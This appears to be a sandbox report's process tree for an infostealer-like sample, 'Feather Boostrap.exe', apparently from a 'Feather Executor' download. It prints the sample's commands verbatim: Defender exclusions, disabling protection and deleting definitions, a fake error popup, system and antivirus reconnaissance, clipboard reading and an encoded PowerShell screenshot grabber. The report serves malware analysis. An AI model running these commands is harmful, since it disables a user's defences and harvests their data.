                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5160,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5132 /prefetch:8
                                                    2⤵
                                                      PID:4420
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5080,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5300 /prefetch:8
                                                      2⤵
                                                        PID:2456
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5756,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5700 /prefetch:2
                                                        2⤵
                                                          PID:1120
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4480,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5240 /prefetch:1
                                                          2⤵
                                                            PID:4424
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4752,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5220 /prefetch:1
                                                            2⤵
                                                              PID:3988
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5192,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3524 /prefetch:1
                                                              2⤵
                                                                PID:4396
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4556,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3188 /prefetch:1
                                                                2⤵
                                                                  PID:224
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3308,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=240 /prefetch:8
                                                                  2⤵
                                                                    PID:2960
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5704,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5428 /prefetch:1
                                                                    2⤵
                                                                      PID:1920
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3352,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3296 /prefetch:8
                                                                      2⤵
                                                                        PID:1732
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4588,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=860 /prefetch:8
                                                                        2⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:4172
                                                                    • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                      "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                      1⤵
                                                                        PID:1884
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                        1⤵
                                                                          PID:4676
                                                                        • C:\Windows\system32\OpenWith.exe
                                                                          C:\Windows\system32\OpenWith.exe -Embedding
                                                                          1⤵
                                                                          • Modifies registry class
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:1084
                                                                        • C:\Windows\System32\rundll32.exe
                                                                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                          1⤵
                                                                            PID:3160
                                                                          • C:\Program Files\7-Zip\7zFM.exe
                                                                            "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Feather Executor.rar"
                                                                            1⤵
                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            PID:4912
                                                                          • C:\Users\Admin\Downloads\Feather Boostrap.exe
                                                                            "C:\Users\Admin\Downloads\Feather Boostrap.exe"
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            PID:1124
                                                                            • C:\Users\Admin\Downloads\Feather Boostrap.exe
                                                                              "C:\Users\Admin\Downloads\Feather Boostrap.exe"
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:4764
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Feather Boostrap.exe'"
                                                                                3⤵
                                                                                  PID:5004
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Feather Boostrap.exe'
                                                                                    4⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:4584
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                  3⤵
                                                                                    PID:636
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                      4⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:4108
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('missing : advapi32.dll', 0, 'ERROR 0x3453', 32+16);close()""
                                                                                    3⤵
                                                                                      PID:3216
                                                                                      • C:\Windows\system32\mshta.exe
                                                                                        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('missing : advapi32.dll', 0, 'ERROR 0x3453', 32+16);close()"
                                                                                        4⤵
                                                                                          PID:4052
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                        3⤵
                                                                                          PID:4756
                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                            tasklist /FO LIST
                                                                                            4⤵
                                                                                            • Enumerates processes with tasklist
                                                                                            PID:2036
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                          3⤵
                                                                                            PID:3376
                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                              wmic csproduct get uuid
                                                                                              4⤵
                                                                                                PID:3248
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                              3⤵
                                                                                                PID:784
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                  4⤵
                                                                                                    PID:4040
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                  3⤵
                                                                                                    PID:1740
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                      4⤵
                                                                                                        PID:3908
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                      3⤵
                                                                                                        PID:952
                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                          wmic path win32_VideoController get name
                                                                                                          4⤵
                                                                                                          • Detects videocard installed
                                                                                                          PID:4776
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                        3⤵
                                                                                                          PID:4988
                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                            wmic path win32_VideoController get name
                                                                                                            4⤵
                                                                                                            • Detects videocard installed
                                                                                                            PID:3400
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                          3⤵
                                                                                                            PID:1796
                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                              tasklist /FO LIST
                                                                                                              4⤵
                                                                                                              • Enumerates processes with tasklist
                                                                                                              PID:4188
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                            3⤵
                                                                                                              PID:1924
                                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                                tasklist /FO LIST
                                                                                                                4⤵
                                                                                                                • Enumerates processes with tasklist
                                                                                                                PID:4208
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                              3⤵
                                                                                                                PID:3536
                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                  4⤵
                                                                                                                    PID:1968
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                  3⤵
                                                                                                                  • Clipboard Data
                                                                                                                  PID:1228
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell Get-Clipboard
                                                                                                                    4⤵
                                                                                                                    • Clipboard Data
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:1888
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                  3⤵
                                                                                                                    PID:1248
                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                      tasklist /FO LIST
                                                                                                                      4⤵
                                                                                                                      • Enumerates processes with tasklist
                                                                                                                      PID:4852
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                    3⤵
                                                                                                                      PID:4076
                                                                                                                      • C:\Windows\system32\tree.com
                                                                                                                        tree /A /F
                                                                                                                        4⤵
                                                                                                                          PID:952
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                        3⤵
                                                                                                                          PID:2436
                                                                                                                          • C:\Windows\system32\systeminfo.exe
                                                                                                                            systeminfo
                                                                                                                            4⤵
                                                                                                                            • Gathers system information
                                                                                                                            PID:2636
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                          3⤵
                                                                                                                            PID:760
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                              4⤵
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:2652
                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v4awjqov\v4awjqov.cmdline"
                                                                                                                                5⤵
                                                                                                                                  PID:2860
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES325C.tmp" "c:\Users\Admin\AppData\Local\Temp\v4awjqov\CSCDDF64A4A66C640D3BCB558858D964A9C.TMP"
                                                                                                                                    6⤵
                                                                                                                                      PID:4332
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                3⤵
                                                                                                                                  PID:4304
                                                                                                                                  • C:\Windows\system32\tree.com
                                                                                                                                    tree /A /F
                                                                                                                                    4⤵
                                                                                                                                      PID:2196
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2072"
                                                                                                                                    3⤵
                                                                                                                                      PID:4996
                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                        taskkill /F /PID 2072
                                                                                                                                        4⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:4668
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                      3⤵
                                                                                                                                        PID:3312
                                                                                                                                        • C:\Windows\system32\getmac.exe
                                                                                                                                          getmac
                                                                                                                                          4⤵
                                                                                                                                            PID:4340

                                                                                                                                    Network

                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                    Replay Monitor

